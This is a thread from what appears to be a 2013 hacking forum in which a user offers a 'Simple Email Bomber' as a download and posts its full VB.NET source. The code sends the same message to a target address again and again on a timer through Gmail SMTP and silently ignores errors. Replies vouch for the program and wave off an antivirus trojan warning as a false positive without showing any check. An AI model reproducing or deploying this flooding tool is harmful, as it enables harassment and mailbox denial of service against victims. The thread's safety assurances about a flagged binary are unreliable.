Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


Simple Email Bomber filter_list
Author
Message
Simple Email Bomber #1
[Image: FRqtKWP.png]


Simple and easy Email Bomber I made. Not much explanation to do for this lol.

Download: http://www.mediafire.com/?4efqda5d3c3oyko
Virus Scan: https://www.virustotal.com/en/file/accad...374116611/
(Ikarus is saying trojan, but Blue can vouch that I make 100% clean programs..Plus honestly why would I put a virus into an email bomber xD)

Here's my source
Code:
Imports System.Net.Mail
Imports System.IO

Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()
    End Sub

    Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
        Timer1.Stop()
    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        Dim MyMailMessage As New MailMessage
        Try

            MyMailMessage.From() = New MailAddress(TextBox1.Text)
            MyMailMessage.To.Add(TextBox3.Text)
            MyMailMessage.Subject = TextBox5.Text
            MyMailMessage.Body = (TextBox4.Text)
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
            SMTP.Send(MyMailMessage)

        Catch ex As Exception

        End Try
    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        Timer1.Interval = TextBox6.Text
    End Sub

    Private Sub Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button4.Click
        MsgBox("You have to set the time interval first and click set speed before clicking bomb. 1 = 1 second. ~Gingie")
    End Sub
End Class
(This post was last modified: 07-19-2013, 09:16 AM by myt21.)
[Image: sasuke_akatsuki_robes_by_giiinger-d6gy0yi.png]

Reply

RE: Simple Email Bomber #2
I'm going to test this soon, I will share the results. Scan looks clean to me.



People, there is no need to worry. I have tested this program and it's safe to use. You have to enter your Gmail credentials but they will not be logged or stored. Enjoy!
Spoiler:
[Image: mnfjzlU.png]

Reply

RE: Simple Email Bomber #3
Alrighty. Let me know if something's not working Smile
[Image: sasuke_akatsuki_robes_by_giiinger-d6gy0yi.png]

Reply

RE: Simple Email Bomber #4
Is the source code included ? Doesn't specify in the thread.
Nice work btw!
[Image: tumblr_m4vms28lYu1qj3ir1.gif]

Reply

RE: Simple Email Bomber #5
No it's not. But I could release the source if you like Smile
[Image: sasuke_akatsuki_robes_by_giiinger-d6gy0yi.png]

Reply

RE: Simple Email Bomber #6
(07-19-2013, 01:59 AM)Gingie Wrote: No it's not. But I could release the source if you like Smile

That would be great!
[Image: tumblr_m4vms28lYu1qj3ir1.gif]

Reply

RE: Simple Email Bomber #7
Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus.
[Image: OkXCq.gif]

Reply

RE: Simple Email Bomber #8
(07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus.

Are you referring to me ?
[Image: tumblr_m4vms28lYu1qj3ir1.gif]

Reply

RE: Simple Email Bomber #9
(07-19-2013, 02:05 AM)Eternity Wrote:
(07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus.

Are you referring to me ?

No, I never mentioned your name in here. I'm referring to the OP, "There's a false positive".
[Image: OkXCq.gif]

Reply

RE: Simple Email Bomber #10
(07-19-2013, 02:07 AM)Hexology Wrote:
(07-19-2013, 02:05 AM)Eternity Wrote:
(07-19-2013, 02:03 AM)Hexology Wrote: Vouch for Gingie's program, saw some of his code on skype; False positive's in e-mail bombers are due to the fact that keylogger's send emails the same exact way, so some lazy virus company put a void on the whole code line, which will make it come up as a virus.

Are you referring to me ?

No, I never mentioned your name in here. I'm referring to the OP, "There's a false positive".
Thanks Hex Smile. I'm most likely gonna release the source so everyone can see for themselves.
[Image: sasuke_akatsuki_robes_by_giiinger-d6gy0yi.png]

Reply







Users browsing this thread: 2 Guest(s)